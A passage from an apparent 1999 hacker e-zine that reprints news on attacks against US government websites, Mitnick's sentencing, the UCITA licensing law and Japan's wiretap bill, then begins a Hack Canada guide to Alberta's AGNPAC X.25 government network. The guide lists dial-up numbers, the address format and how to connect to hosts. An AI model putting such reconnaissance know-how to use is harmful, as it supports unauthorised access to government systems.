  2893.      To protect against attacks that in recent days and weeks have disabled sites run by the Energy Department, the FBI, the Senate,
  2894.      the Interior Department, and the White House, the Defense Department said it planned to shut down its Web site for a short time
  2895.      today, said Ken Bacon, the Pentagon's chief spokesman.
  2896.  
  2897.      "This is much more protective than reactive," Bacon said. "It's looking to the future to prevent the types of problems that the other
  2898.      agencies" have experienced in recent weeks on their sites, he said.
  2899.  
  2900.  
  2901.      Attacking U.S. government Web sites is becoming an increasingly popular tool of people angry with the Clinton administration
  2902.      and its agencies.
  2903.  
  2904.      Last week hackers responded to a six-state FBI sweep of about 20 suspected hackers by attacking several government Internet
  2905.      locations, forcing the FBI, the Interior Department, and the U.S. Senate to temporarily shut down their Web sites.
  2906.  
  2907.      After NATO jets hit the Chinese Embassy in Belgrade in May, hackers from China attacked a handful of U.S. government sites,
  2908.      including one maintained by the Energy Department. In an unrelated incident, the official White House site was shut down briefly
  2909.      because of an attempt to tamper with it by unidentified hackers, officials said.
  2910.  
  2911.      In recent years the Justice Department's site was shut down once by hackers who put Nazi swastikas on its home page, and
  2912.      hackers forced the CIA to shut down its site after they changed the name from "Central Intelligence Agency" to "Central Stupidity
  2913.      Agency."
  2914.  
  2915.      With many U.S. government sites under attack, computer security experts are bracing for what could be a month full of additional
  2916.      Internet hacking incidents.
  2917.  
  2918.      Supporters of Kevin Mitnick, a hacker jailed in Los Angeles since February 1995, will demonstrate in 14 U.S. cities Friday,
  2919.      seeking his release to a halfway house and an easy probation when he is sentenced on June 14.
  2920.  
  2921.      Mitnick, 35, pleaded guilty on March 26 to seven counts of wire fraud, computer fraud, and illegal interception of a wire
  2922.      communication.
  2923.  
  2924.      Federal officials said he impersonated an employee of Finland-based Nokia Mobile Phones to steal software worth $240,000. He
  2925.      also stole software from Motorola, Novell, Fujitsu Network Transmission Systems, and Sun Microsystems, federal officials said.
  2926.  
  2927.      Supporters of Mitnick say the four years Mitnick has spent in jail awaiting trial is a harsher term than for many people convicted of
  2928.      violent crimes like robbery and assault. Their protest Friday will be seeking a more lenient sentence.
  2929.  
  2930.      The U.S. attorney for the Central District of California said Mitnick will be sentenced to 46 months in prison on June 14 as part of
  2931.      his plea bargain agreement with the government.
  2932.  
  2933.      Mitnick, whose exploits as a hacker inspired an upcoming Hollywood movie, also will be obliged to pay the victims of his crimes
  2934.      from any profits he makes from books or movies about his life, a spokesman for the U.S. attorney's office said.
  2935.  
  2936.      While hacking incidents may not be part of Friday's nationwide protest, there may be a surge in attacks across the Internet if
  2937.      Mitnick's sentence is perceived as too stiff, said John Vranesevich, the founder and director of AntiOnline.
  2938.  
  2939.      "Hackers attack when they're mad about something. The demonstration Friday will be an attempt to educate," said Vranesevich.
  2940.      "However, if Kevin Mitnick is put in jail, there very well could be more attacks after that."
  2941.  
  2942.      Still, other experts said Internet sites should upgrade their security against possible attack before Friday.
  2943.  
  2944.      "Given the timing, it probably would be a good idea to be more on guard than usual," said Jevon Jaconi, the district attorney of
  2945.      Kewaunee County, Wisconsin, and an expert in the developing field of cyberspace law.
  2946.  
  2947.      Between 70 percent and 80 percent of all Internet hacking attacks come on systems that have not updated their security codes,
  2948.      routinely sent by computer manufacturers and network administrators, Jaconi said.
  2949.  
  2950.      The best way to prevent hacking attacks in the future is to heed those security warnings and implement the needed changes, he
  2951.      said. 
  2952.     
  2953.      Washington Post;
  2954.      
  2955.      Online Security Is Pentagon's Latest Battle
  2956.  
  2957.      By John Schwartz
  2958.      Washington Post Staff Writer
  2959.      Wednesday, June 2, 1999; Page A2 
  2960.  
  2961.      The Department of Defense announced yesterday that it was briefly pulling
  2962.      its computers off the Internet to upgrade security by installing hardier
  2963.      "firewall" protection between computer systems that are accessible to the
  2964.      outside world and those that should not be.
  2965.  
  2966.      Noting the recent spate of hacker attacks on government Web sites,
  2967.      Pentagon spokesman Kenneth Bacon said the upgrade is part of a
  2968.      long-term computer security effort: "This is much more protective than
  2969.      reactive."
  2970.  
  2971.      In fact, the Defense Department is engaged in long-term planning that
  2972.      could completely move its unclassified networks off the Internet and on to
  2973.      a proprietary system. The GNIE project (Global Network Information
  2974.      Enterprise, pronounced "genie") will unveil this major proposal this
  2975.      summer, said DOD spokeswoman Susan Hansen. "A lot of systems over
  2976.      the years have been patched together," she said, and "of course, you're
  2977.      only as strong as your weakest link."
  2978.  
  2979.      Skirmishes between federal law enforcement officials and computer
  2980.      intruders have been intensifying in recent weeks. Hackers angered by
  2981.      about 20 recent FBI raids on suspected members of the loose-knit
  2982.      computer underground have launched a variety of attacks on Web sites
  2983.      maintained by the FBI, the Senate, the Interior Department and the White
  2984.      House.
  2985.  
  2986.      "For those who do this for whatever kind of sport it provides them, they'll
  2987.      be found, and they'll be prosecuted," White House press secretary Joe
  2988.      Lockhart said yesterday.
  2989.  
  2990.      Securing government Web sites against attack is difficult because the sites
  2991.      are designed for open access; that's why security-conscious computer
  2992.      managers separate Web computer systems from those that contain critical
  2993.      internal information.
  2994.  
  2995.      In the case of the FBI computer intrusions, for example, "these are not the
  2996.      internal systems that contain classified or top-secret information," said
  2997.      Justice Department spokeswoman Carole Florman. "Those systems have
  2998.      not been at risk, and they have not been compromised." 
  2999.  
  3000.      Instead, she said, the attacked sites are "the FBI's vehicle for
  3001.      communicating with the public. . . . What they are really doing is denying
  3002.      access to the American public to the information available on that Web
  3003.      site."
  3004.  
  3005.      FBI agents across the country have been focusing on a gang that calls
  3006.      itself "Global Hell." The agents appear to be going after leading members
  3007.      of the group and some peripheral figures, hoping to find bigger players,
  3008.      said John Vranesevich, founder of antionline.com, a Web site that tracks
  3009.      hacker activity. 
  3010.  
  3011.      Vranesevich called the hacker response "a tantrum," saying that "many of
  3012.      them are now realizing for the first time that everything they've been doing
  3013.      for the past few months [has] been watched."
  3014.  
  3015.      Those targeted by the raids say that the agents are casting a very broad
  3016.      net. Paul Maidman, 18, was asleep when FBI agents entered his
  3017.      apartment. The New Jersey teen's mother had already left for work for
  3018.      the day when a half-dozen armed agents grabbed Maidman's computer
  3019.      and began hours of questioning.
  3020.  
  3021.      Noting that he has no relationship with Global Hell but that he has sat in on
  3022.      Internet chats where its members have congregated, Maidman said, "I'm
  3023.      not really counting on getting it [the computer] back any time soon." He
  3024.      added that he has shied away from computer mischief since he turned 18.
  3025.  
  3026.      Maidman said that while the experience with the government agents was
  3027.      intimidating, "they were actually really nice." When his 12-year-old sister
  3028.      woke up, "they made her waffles," he said.
  3029.  
  3030.      Experts in computer crime said the government reaction constitutes just
  3031.      the latest wave of law enforcement efforts to curtail computer mischief.
  3032.  
  3033.      "It's immensely foolish of the hacker underground to step up its assaults on
  3034.      law enforcement sites," said Michael Godwin, author of the book "Cyber
  3035.      Rights."
  3036.  
  3037.      "These two cultures regard each other with such deep antagonism and
  3038.      distrust that you might have to call in [veteran diplomat] Richard
  3039.      Holbrooke to sort it out," Godwin said.
  3040.  
  3041.               ⌐ Copyright 1999 The Washington Post Company 
  3042.               
  3043.        
  3044.       @HWA
  3045.       
  3046.  11.0 UCITA About to be Approved 
  3047.       ~~~~~~~~~~~~~~~~~~~~~~~~~~
  3048.       
  3049.       From HNN http://www.hackernews.com/    
  3050.       
  3051.         
  3052.       contributed by Ryan.Russell 
  3053.       The Uniform Computer Information Transactions Act is
  3054.       about to be approved. This draconian act will give
  3055.       vendors the right to repossess software by disabling it
  3056.       remotely (meaning you have to leave a port open on the
  3057.       firewall? Just imagine the DoS possibilities.); prevent the
  3058.       transfer of licenses from one party to another without
  3059.       vendor permission (Does this include my copy of
  3060.       LoadRunner for the Atari2600 that I sold for $5?);
  3061.       outlaw reverse engineering (Whoa, no more third party
  3062.       security analysis). This new law is being supported by
  3063.       such software giants as Microsoft, Adobe, and WinPro.
  3064.       The proposed legislation is set to go before the National
  3065.       Conference of Commissioners on Uniform State Laws in
  3066.       July. If this panel approves this measure it will then be
  3067.       sent to state legislations around the country. (Good
  3068.       way to bypass the feds.) 
  3069.  
  3070.       InfoWorld
  3071.       http://www.infoworld.com/cgi-bin/displayStory.pl?/features/990531ucita.htm
  3072.       
  3073.       
  3074.       National Conference of Commissioners on Uniform State Laws
  3075.       http://www.2bguide.com/docs/040799pr.html
  3076.       
  3077.       InfoWorld;
  3078.       
  3079.       Licensing time bomb
  3080.  
  3081.        Software-law dispute explodes as enactment draws near
  3082.  
  3083.        By Jessica Davis
  3084.  
  3085.        Imagine the horror of walking into work one day to find your software vendor holding your company hostage by threatening to shut down
  3086.        your mission-critical systems unless you concede to its terms.
  3087.  
  3088.        Sounds illegal, right? Perhaps not.
  3089.  
  3090.        Although many IT professionals are unaware of it, that practice will become legally defensible if new legislation called the Uniform Computer
  3091.        Information Transactions Act, or UCITA, is approved.
  3092.  
  3093.        UCITA is a proposed law for applying consistent rules to computer software licenses across
  3094.        all 50 states. It would
  3095.  
  3096.        * give vendors the right to repossess software by disabling it remotely;
  3097.  
  3098.        * make the terms of shrink-wrapped licenses more enforceable;
  3099.  
  3100.        * prevent the transfer of licenses from one party to another without vendor permission;
  3101.  
  3102.        * allow vendors to disclaim warrantees; and
  3103.  
  3104.        * outlaw reverse engineering.
  3105.  
  3106.        Proponents of the law, primarily software vendors, say it is time for a uniform law that applies
  3107.        directly to software licenses. Critics, including technology consumer groups such as the
  3108.        Society of Information Managers (SIM), say UCITA is fatally flawed and should be killed.
  3109.        Other trade organizations representing the motion picture industry, newspapers, magazines, and the music recording industry, have joined
  3110.        SIM in opposing UCITA.
  3111.  
  3112.        In July, a state attorney organization known as the National Conference of Commissioners on Uniform State Laws (NCCUSL) will meet in
  3113.        Denver to approve UCITA. If the organization gives the proposal a green light, a few state legislatures are likely to rubber-stamp it by the
  3114.        end of the year and UCITA will become law, according to UCITA experts.
  3115.  
  3116.        This fast time table has opponents up in arms. Although SIM is in favor of a law to govern software licensing, it says it believes UCITA
  3117.        cannot be fixed.
  3118.  
  3119.        "This law would significantly increase the level of the burden on the IT procurement function and significantly increase the cost of procurement
  3120.        -- both in staff costs and out-of-pocket costs," says Susan Nycum, a SIM member and an attorney at law firm Baker & McKenzie, in Palo
  3121.        Alto, Calif.
  3122.  
  3123.        Although many software vendor representatives attended development meetings to discuss the law and lobbied its creators, most attendees
  3124.        contacted by InfoWorld refused to discuss their views on the record.
  3125.  
  3126.        And although this law threatens to profoundly affect how IT departments in both large and small companies do business, most IT
  3127.        professionals remain unaware of the law and its ramifications.
  3128.  
  3129.        "We were naive about how things were handled," says Randy Roth, a SIM member who also works at the Principal Financial Group, in Des
  3130.        Moines, Iowa. "We thought, gee, when people are writing these laws they are making sure they are balanced and somebody is watching out
  3131.        for our best interests."
  3132.  
  3133.  
  3134.        Blackmail tool?
  3135.  
  3136.        To the IT managers who have been following UCITA, perhaps the most threatening provision is vendor "self-help," or vendor repossession
  3137.        of software.
  3138.  
  3139.        According to the most recent draft of the law, a vendor can remotely disable a customer's software if the vendor decides that the customer
  3140.        has violated its license and the license includes language that says self-help is a possibility. The proposed law would require the vendor to
  3141.        notify a company representative designated in the contract 15 days prior to taking such action, although it does not specify the means of
  3142.        notifying that representative. Such messages could spend weeks languishing in voice mail or e-mail if the wrong person happens to be on
  3143.        vacation.
  3144.  
  3145.        "Self-help is a draconian remedy in which the licensor would act as judge, jury, and executioner to electronically disable or repossess
  3146.        software when in its self determination, the licensee has done something bad," says Barney Kantar, a member of SIM who also works at
  3147.        Dupont, in Wilmington, Del.
  3148.  
  3149.        UCITA's champions counter that the software market would not tolerate vendors who shut off customers' software.
  3150.  
  3151.        "So far the market has been a very good disciplinarian," says Micalyn Harris, vice president, secretary, and general counsel at Winpro, in
  3152.        Ridgewood, N.J. "Anyone who gets a reputation for shutting off software on customers is not very likely to stay in business."
  3153.  
  3154.        But fear of getting a bad reputation has not stopped vendors from taking such draconian measures in the past. The most extreme case of a
  3155.        vendor repossessing software happened almost 10 years ago. Logisticon, a software vendor in Santa Clara, Calif., shut down Revlon
  3156.        Group's systems over the phone lines because it said Revlon had not paid the remaining $180,000 balance of a $1.2 million contract for
  3157.        warehouse management software. In a subsequent lawsuit, Revlon claimed its shipping operations were shut down for three days. The case
  3158.        was settled out of court in late 1990. As part of the settlement, the parties agreed not to divulge the terms.
  3159.  
  3160.        Because UCITA specifically authorizes electronic self-help, critics say that software developers would have legal justification to build back
  3161.        doors and software time bombs in their programs. That itself would create a tremendous threat and reduce users' negotiating power, whether
  3162.        the license specified the self-help rights or not.
  3163.  
  3164.        "The real danger of self-help is not so much that it will be invoked, but rather that it will be used as a threat hanging over licensees in order to
  3165.        extort compromises, concessions, and other payments that they would not otherwise agree to provide," Dupont's Kantar adds.
  3166.  
  3167.        Adobe Systems corporate counsel Vincent Bryan, however, argues that according to current law, a vendor could shut down a customer
  3168.        without any notice. The self-help provisions of UCITA, he says, are designed to protect the software customer.
  3169.  
  3170.        "What [the self-help provision] attempted to do was to reach a compromise between what SIM wanted -- which was that you had to go to
  3171.        court and trial before a small licensor could get paid," Bryan says.
  3172.  
  3173.        John McCabe, NCCUSL legal counsel and legislative director, calls UCITA's provisions on vendor self-help a middle position.
  3174.  
  3175.        "We are not banning this; we are not requiring judicial permission," McCabe says. "We are just putting parameters around it."
  3176.  
  3177.        McCabe added that vendors are not permitted to exercise self-help if the vendors are aware of third parties that could suffer serious losses
  3178.        because of it.
  3179.  
  3180.        Although Microsoft's UCITA representative, senior corporate attorney Robert W. Gomulkiewicz, requested that he not be quoted, a
  3181.        Microsoft public relations representative agreed that the law is designed to protect customers.
  3182.  
  3183.        But the law's detractors dispute that vendor self-help provisions protect consumers, and they find this to be the most threatening aspect of the
  3184.        proposed law.
  3185.  
  3186.        "Once we have licensed a product and put it into mission-critical use, self-help becomes a blackmail tool," Principal's Roth says. "Customers
  3187.        have no negotiating power at all."
  3188.  
  3189.  
  3190.        Pass-alongs prohibited
  3191.  
  3192.        Another UCITA provision could increase the costs of mergers and acquisitions by prohibiting the transfer of a software license from one
  3193.        company to another without permission from the vendor. Many shrink-wrapped licenses have blanket restrictions on transferability already,
  3194.        but vendors generally do not try to get a court to enforce them in a merger. UCITA would make those terms enforceable.
  3195.  
  3196.        For example, if you have Microsoft Word on your computer, you will need to obtain permission from Microsoft to transfer that copy of
  3197.        Word from Company A to Company B, according to Cem Kaner, a career software developer in Santa Clara, Calif., an attorney, and the
  3198.        author of Bad Software: What to do when software fails.
  3199.  
  3200.        "Imagine doing that for all the computer programs, utilities, drivers, printer drivers, clip art, fonts," Kaner says. "At some point the cost of
  3201.        having lawyers inspect every utility to figure out how to transfer it becomes too high. What will happen is people will simply erase the hard
  3202.        drives on the machines."
  3203.  
  3204.        Software vendors argue that they are within their rights to limit the use of their products.
  3205.  
  3206.        "Licenses tell users what it is that creators or providers of software regard as fair use," Winpro's Harris says.
  3207.  
  3208.        Those definitions of fair use included in licenses have become more aggressive as the years have gone by, according to SIM, and often
  3209.        include transfer restrictions.
  3210.  
  3211.        "If I buy a book, I can't make a copy and sell it. But I can sell my copy of the book or I can give away my copy," Dupont's Kantar says.
  3212.        "The same should be true for software."
  3213.  
  3214.        However, UCITA transforms software from a product into a license to use this product, according to attorney Kaner.
  3215.  
  3216.        "That flies in the face of how we have dealt with intellectual property in the past," Kaner says. "If you put something into the mass market,
  3217.        your rights as far as transferability end when the first buyer gives you the money."
  3218.  
  3219.        But some vendors believe that because software is fundamentally different from other products, it deserves new rules.
  3220.  
  3221.        "What UCITA is doing is validating the terms [of sale] after you pay," Adobe's Bryan says. "The academic community and consumer groups
  3222.        are saying that's not right -- the contract should be what the parties agree to at the time there is a transaction."
  3223.  
  3224.        Bryan notes that airline tickets and rental-car reservations' licensing terms are not revealed until after sales are completed.
  3225.  
  3226.  
  3227.        Not my fault
  3228.  
  3229.        Another hotly contested provision of UCITA is one that allows vendors to disclaim warrantees for defective, buggy, or virus-infested
  3230.        software.
  3231.  
  3232.        Today, any features that a vendor demonstrates at a trade show or writes about in a product manual must be a working part of the product,
  3233.        according to Kaner, because under current law, any statement or affirmation of fact by seller to buyer is part of the basis of the bargain.
  3234.  
  3235.        "UCITA takes the notion of a warrantee by demonstration and guts it," Kaner says. "And in the mass market, UCITA makes it trivially easy
  3236.        to disclaim warrantees."
  3237.  
  3238.        Although proponents claim that the provisions in UCITA are not a change from the current law, other industry observers view UCITA as a
  3239.        license for commercial developers to turn out buggier software.
  3240.  
  3241.        "It says manufacturers are not liable for the poor quality of their products," according to Watts Humphrey, a fellow of the Software
  3242.        Engineering Institute, a development institution with headquarters at Carnegie-Mellon University, in Pittsburgh. "I think that is bad for the
  3243.        nation."
  3244.  
  3245.        The licensing loopholes that UCITA provides will cause lowered standards for software performance and will cost user companies more
  3246.        money because they will have to assure that the product works properly before they buy it, according to Baker & McKenzie's Nycum.
  3247.  
  3248.        Software vendors counter that they need protection from customers in the fuzzy area of computer performance guarantees.
  3249.  
  3250.        "If I have to guarantee that my software will perform the way you think it's going to perform, that's going to be costly for me," Winpro's
  3251.        Harris says. "Software isn't like a piece of furniture -- there are many other variables."
  3252.  
  3253.        But critics do not believe software companies need more legal protection than they already have.
  3254.  
  3255.        "I have yet to hear a good argument as to why the software industry needs more than it has today," Dupont's Kantar says. "They are enjoying
  3256.        double-digit growth and huge success in the marketplace. Why does the software industry need protection?"
  3257.  
  3258.        Detractors also fear that UCITA will turn shrink-wrapped software licensing agreements -- which have become more and more restrictive
  3259.        over time -- into enforceable law.
  3260.  
  3261.        For example, many licensing agreements today state that customers who test the vendor's software are not allowed to publish the results of
  3262.        those tests, Kantar says.
  3263.  
  3264.        "We frequently see license agreements that attempt to restrict free speech in prohibitions against publishing test results," Kantar explains.
  3265.        "UCITA would permit a licensor to restrict such fair use under a contract."
  3266.  
  3267.        Many licensing agreements that come with shrink-wrapped software are "questionable at best," Principal's Roth says. "I would never put my
  3268.        name on a contract like that, so why should I be forced to accept it if I'm going to buy a lot of shrink-wrapped software?"
  3269.  
  3270.  
  3271.        Read the fine print
  3272.  
  3273.        SIM members also say they believe that the cost of procurement will rise if UCITA becomes law because companies will have to scrutinize
  3274.        shrink-wrapped software licenses as closely as those of mainframes and other large systems.
  3275.  
  3276.        "Large companies spend about as much on shrink-wrapped software as they do on non-shrink-wrapped software," Kantar says. "Today
  3277.        most businesses don't devote significant resources to the negotiation of shrink-wrapped licenses. They will now have to start doing so
  3278.        because the default rules are shifting in favor of the licensor."
  3279.  
  3280.        UCITA has other controversial provisions, leading the act's detractors to say it is too flawed to fix.
  3281.  
  3282.        "If you are going to come up with a law that will last another 50 years, it needs to be written to be flexible and fair, and not [as] a wish list of
  3283.        what vendors want right now," Baker & McKenzie's Nycum says.
  3284.  
  3285.        Michael Lattig, Bob Trott, and Jeff Walsh contributed to this article.
  3286.  
  3287.  
  3288.  
  3289.        www.infoworld.com
  3290.  
  3291.        For more on Uniform Computer Information Transactions Act (UCITA), go to www.infoworld.com/UCITA.
  3292.  
  3293.        Information about UCITA's precursor, the Uniform Commercial Code 2B draft, and subsequent motions are available at www.2bguide.com.
  3294.  
  3295.        A list of National Conference of Commissioners on Uniform State Laws (NCCUSL) representatives is at
  3296.        www.simnet.org/public/programs/issues/ucccode.html.
  3297.  
  3298.        NCCUSL can be reached at www.nccusl.org.
  3299.  
  3300.        The Society of Information Managers can be reached at www.simnet.org.
  3301.  
  3302.  
  3303.  
  3304.        The origins of a law
  3305.  
  3306.        The Uniform Computer Information Transactions Act (UCITA) began as a proposed change to the Uniform Commercial Code's Article 2,
  3307.        which dealt with the sale of goods.
  3308.  
  3309.        The Uniform Commercial Code (UCC) are laws designed to make commerce uniform from state to state. These laws are written by the
  3310.        National Conference of Commissioners on Uniform State Laws (NCCUSL), a group founded in the late 19th century during the states' rights
  3311.        movement and approved by the American Law Institute (ALI). The commissioners are attorneys, usually from small law firms, appointed and
  3312.        paid for by the states to represent them to the Conference.
  3313.  
  3314.        Once NCCUSL approves a bill, it is very likely to be passed by state governments.
  3315.  
  3316.        The ALI advises NCCUSL on creating amendments to the UCC. ALI is largely an honorary, academic organization of tenured law
  3317.        professors.
  3318.  
  3319.        ALI officials called NCCUSL's 2B draft "unbalanced" and declined to put it to a membership vote at their annual meeting earlier this month.
  3320.        NCCUSL decided then to make 2B a stand-alone bill, not part of the UCC. The proposed law then became known as UCITA. A current
  3321.        draft of UCITA was not available at press time.
  3322.  
  3323.  
  3324.       @HWA
  3325.       
  3326.  12.0 Japan Follows Australia in Limiting Privacy 
  3327.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3328.          
  3329.       From HNN http://www.hackernews.com/    
  3330.         
  3331.       contributed by erewhon 
  3332.       In an effort to to help law enforcement stop murders,
  3333.       drug trafficking, gun running, and illegal immigration,
  3334.       Japan is proposing new draconian legislation that will
  3335.       give sweeping power to eavesdrop on all
  3336.       communications. This includes telephone and email. 
  3337.  
  3338.       Wired             
  3339.       
  3340.       
  3341.       Japan: More Crime, Less Privacy
  3342.       by David Lazarus 
  3343.       
  3344.       3:00 a.m.  2.Jun.99.PDT
  3345.       TOKYO -- Privacy issues have taken center stage as Japan prepares to enact legislation allowing the police to eavesdrop on phone calls, intercept
  3346.       fax and computer transmissions, and read email. 
  3347.       
  3348.       The draconian measures are ostensibly intended to help law enforcement halt premeditated murders, trafficking in drugs and guns, and smuggling of
  3349.       illegal aliens into Japan. 
  3350.       
  3351.       At least that's what a bill cobbled together by the country's coalition government says. 
  3352.       
  3353.            
  3354.       
  3355.       The reality could be far more intrusive, especially after investigators receive an official green light to comb through private correspondence and
  3356.       communications. 
  3357.       
  3358.       Japanese citizens' groups -- a hodgepodge of activists with little actual influence over policy decisions -- have decried the wiretapping legislation
  3359.       as a gross invasion of privacy, and opposition politicians boycotted a vote on the legislation last Friday. But the government insists that what Japan
  3360.       needs to restore public order is less civil liberty and more Big Brother. 
  3361.       
  3362.       People here are scared. Crime -- once unthinkable in Japan -- is on the rise. The country's yakuza racketeers are growing increasingly bolder in
  3363.       their schemes as nearly a full decade of recession eats away at traditional revenue sources, such as payoffs from companies and corrupt
  3364.       politicians. 
  3365.       
  3366.       For law-enforcement authorities, the trouble began back in 1995 when Aum Shinrikyo cultists released sarin gas in the Tokyo subway, killing a
  3367.       dozen people. The cops simply never saw the attack coming, and have been agitating for greater surveillance powers as a means of preventing
  3368.       such nastiness from happening again. 
  3369.       
  3370.       Wiretapping is a convenient shortcut for investigators. And, as the pervasive eavesdropping of former East Bloc countries made undeniably clear,
  3371.       once authorities start listening it's a hard habit to break. 
  3372.       
  3373.       Yozo Marutake, a former senior executive with a manufacturer of hearing aids called Rion, said last week that the Japanese police have been
  3374.       bugging phones for decades. How does he know this? Because his company sold the cops all their surveillance gear, and had done so since first
  3375.       being approached by authorities in 1957, he said. 
  3376.       
  3377.       So why would the Japanese police now be seeking legal backing for their electronic skulking? One reason might have to do with charges from an
  3378.       opposition politician last year that his phone had been bugged. The courts upheld the politician's claims, although the cops never actually admitted
  3379.       being behind the incident. 
  3380.       
  3381.       The Internet undoubtedly will be a low priority at first for Japan's snoops, but this will change as more people, criminals included, go online. For
  3382.       now, it looks like the cops are still unsure how to proceed where matters of cyberspace are concerned. 
  3383.       
  3384.       Police last week raided the Sapporo home of an 18-year-old who had posted a bunch of hit tunes on his home page using the MP3 compression
  3385.       format. The teen, needless to say, hadn't worked out copyright issues in advance with related Japanese recording companies. 
  3386.       
  3387.       Police didn't reveal how they learned about the song-laden site. But they said they moved quickly to shut things down after concluding that illegal
  3388.       actions were being perpetrated. 
  3389.       
  3390.       This only took them three months of monitoring downloads to figure out. 
  3391.       
  3392.       David Lazarus is on special assignment. He is filing occasional dispatches on the current state of business and technology in Japan. 
  3393.       
  3394.       @HWA
  3395.       
  3396.  13.0  AGNPAC Revealed 
  3397.        ~~~~~~~~~~~~~~~  
  3398.        
  3399.        From HNN http://www.hackernews.com/    
  3400.  
  3401.  
  3402.        contributed by Hack.Canada 
  3403.        A document describing the Alberta Government Packet
  3404.        Switched Network (AGNPAC) has been released by Hack
  3405.        Canada. This document goes into great detail about the
  3406.        X.25 WAN that spans Alberta. 
  3407.  
  3408.        Hack Canada     
  3409.        http://www.hackcanada.com/homegrown/agnpac_guide.txt
  3410.        
  3411.        
  3412.                         Complete Guide to AGNPAC v1.0
  3413.  
  3414.                                   CYB0RG/ASM
  3415.  
  3416.                               www.hackcanada.com
  3417.  
  3418.                                    05.30.99
  3419.       
  3420.       ----------------
  3421.       What is AGNPAC?
  3422.       ----------------
  3423.       
  3424.       AGNPAC is the Alberta Government Packet Switched Network based on the X.25
  3425.       protocol. It is a Wide Area Network which spans across Alberta. It is used
  3426.       to connect systems and networks used by the Alberta Government, Alberta
  3427.       Registries, hospitals, schools, libraries, and other such entities.
  3428.       
  3429.       The backbone for this network is made up of full T1 fibre optic lines. Other
  3430.       WAN's and nodes are connected to the AGNPAC backbone via T1, 128K Frame Relay
  3431.       circuits (full CIR), and multiple 128K Frame Relay circuits. The network can
  3432.       also be connected to through local dialups in most cities and large towns in
  3433.       Alberta.
  3434.       
  3435.       AGNPAC is built, managed, and maintained by Alberta Public Works Supply and
  3436.       Service (PWSS) and funded by the Alberta provincial government. Recently
  3437.       publicly funded school board use has also come into play with beta trials
  3438.       becoming more widespread through the late nineties.
  3439.       
  3440.       The AGNPAC network has been in existance since at least 1995, however, no
  3441.       information regarding it has been publicly available... until now. There is
  3442.       still much to learn about this network, and this file, the most complete
  3443.       publicly available document on AGNPAC, is still somewhat lacking. However,
  3444.       this file will be updated as new discoveries are made.
  3445.       
  3446.       
  3447.       ---------------------
  3448.       Connecting to AGNPAC
  3449.       ---------------------
  3450.       
  3451.       Dial ports exist in most major towns and cities across Alberta. The standard
  3452.       communication parameter 8/N/1 is used although some systems on AGNPAC may use
  3453.       7/E/1. When you connect you will see a message similar to this:
  3454.       
  3455.          AGNPAC: 4007 030
  3456.       
  3457.       
  3458.       -----------
  3459.       Dial Ports
  3460.       -----------
  3461.       
  3462.       Athabasca             675-9424
  3463.       Barrhead              674-2045
  3464.       Blairmore             562-7426
  3465.       Bonnyville            826-1753
  3466.       Brooks                793-2254
  3467.       Calgary               234-8066
  3468.       Calgary               269-7425   v.34 only
  3469.       Camrose               672-3689
  3470.       Canmore               678-6966
  3471.       Cardston              653-1006
  3472.       Claresholm            625-2241
  3473.       Drayton Valley        542-6038
  3474.       Drumheller            823-4224
  3475.       Edmonton              420-6198   v.34 only
  3476.       Edmonton              425-5674
  3477.       Edmonton              425-5691
  3478.       Edmonton              429-1522
  3479.       Edson                 723-5352
  3480.       Evansburg             727-3572
  3481.       Fairview              835-5688
  3482.       Fort McMurray         743-6302
  3483.       Grande Cache          827-2044
  3484.       Grande Prairie        539-0195
  3485.       Hanna                 854-2615
  3486.       High Level            926-2142
  3487.       High Prairie          523-2673
  3488.       Hinton                865-1393
  3489.       Jasper                852-4846
  3490.       Lac La Biche          623-3832
  3491.       Lethbridge            380-2067
  3492.       Lloydminster          875-1237
  3493.       Manning               836-2683
  3494.       Medicine Hat          528-2135
  3495.       Olds                  556-2930
  3496.       Oyen                  664-2505
  3497.       Peace River           624-1055
  3498.       Pincher Creek         627-2444
  3499.       Red Deer              341-4097
  3500.       Rocky Mountain House  845-5552
  3501.       Slave Lake            849-2826
  3502.       Smoky Lake            656-2291
  3503.       St. Paul              645-1847
  3504.       Stettler              742-5581
  3505.       Valleyview            524-2454
  3506.       Vegreville            632-2213
  3507.       Vermillion            853-6941
  3508.       Wainwright            842-5103
  3509.       Wetaskiwin            352-2384
  3510.       Whitecourt            778-4677
  3511.       
  3512.       
  3513.       ------------------
  3514.       System Addressing
  3515.       ------------------
  3516.       
  3517.       Systems attached to AGNPAC are addessed most commonly by 9 digit Network User
  3518.       Addresses (NUA's). That's 1 billion possible NUA's. These NUA's follow a
  3519.       simple format of 9 consecutive digits (#########). Other NUA formats may
  3520.       exist but the only exception to the 9 digit NUA that I know of is something
  3521.       I call an "alias".
  3522.       
  3523.       Aliases are acronyms preceded by a dot. These aliases resolve to a regular
  3524.       NUA which is revealed when you connect to the host. Here are some examples of
  3525.       known aliases and their corresponding NUA's:
  3526.       
  3527.         .govtcpdial  =  4004 11188
  3528.         .cgsbbs      =  4004 059010  (oddly enough this resolves to a 10 digit NUA)
  3529.       
  3530.       Anyway, back to the NUA's. As far as I can tell the 9 digit NUA's have a 4
  3531.       digit prefix and a 5 digit suffix. Or possibly they break down like this:
  3532.       
  3533.                          (####)(###)(##)
  3534.                            :     :    :
  3535.               City Code? ..:     :    :
  3536.                                  :    :
  3537.          Address Prefix? ........:    :
  3538.                                       :
  3539.          System Address? .............:
  3540.       
  3541.       But that's just a hunch I've got based on the NUA's that I know of. I also
  3542.       have reason to believe there may be system subaddressing, or Logical Channels
  3543.       (LCN), in which case the address may be suffixed with 1 or 2 digits to
  3544.       connect to a subaddress of the system. And there may also be mnemonics, data
  3545.       characters which follow the address preceded by a comma. Mnemonics are used
  3546.       to connect to sub-systems of the host system. But again, this is all just
  3547.       speculation for now.
  3548.       
  3549.       
  3550.       ----------------------------
  3551.       Connecting to a Host System
  3552.       ----------------------------
  3553.       
  3554.       To connect to a system you enter it's NUA and if it is valid you will get a
  3555.       message like this:
  3556.       
  3557.          AGNPAC: call connected to #### #####
  3558.       
  3559.       Now you may receive an identifying message and the system's prompt depending
  3560.       on the system, or you may get a connect message and no prompt at all.
  3561.       Sometimes if you press <enter> it will forward you to the hosts prompt.
  3562.       
  3563.       To disconnect from a host that you have connected to and get back to the main
  3564.       prompt use the command "<ctrl>p clr".
  3565.       
  3566.       For a list of known NUA's refer to the "AGNPAC NUA Directory" (agnpacnua.txt)
  3567.       on www.hackcanada.com in the Canadian H/P-Hacking section.
  3568.       
  3569.       
  3570.       ---------------------
  3571.       Command Line Options
  3572.       ---------------------
